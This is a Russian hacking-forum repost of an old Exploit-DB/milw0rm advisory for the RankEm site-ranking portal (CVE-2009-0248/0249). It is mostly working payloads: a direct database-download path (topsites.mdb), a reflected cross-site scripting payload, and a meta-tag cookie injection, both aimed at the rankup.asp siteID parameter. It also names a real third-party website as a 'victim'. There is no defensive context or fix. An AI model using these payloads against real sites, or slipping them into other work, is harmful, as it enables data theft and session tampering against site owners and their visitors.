Exploit Rankem - File Disclosure / Cross-Site Scripting / Cookie

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
7805
Проверка EDB
  1. Пройдено
Автор
POUYA_SERVER
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2009-0249 cve-2009-0248
Дата публикации
2009-01-16
Код:
#########################################################
---------------------------------------------------------
Portal Name: RankEm
Download : http://www.katywhitton.com/downloads/rankEm/rankEmDL.zip
Author : Pouya_Server , [email protected]
Vulnerability : (DD/XSS/CM)
---------------------------------------------------------
#########################################################
[DD]:
http://site.com/[Path]/database/topsites.mdb
[XSS]:
http://site.com/rankup.asp?siteID=<script>alert(1369)</script>
[CM]:
http://site.com/rankup.asp?siteID=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>
---------------------------------
Victem :
http://www.top50.co.nz

# milw0rm.com [2009-01-16]
 
Источник
www.exploit-db.com

Похожие темы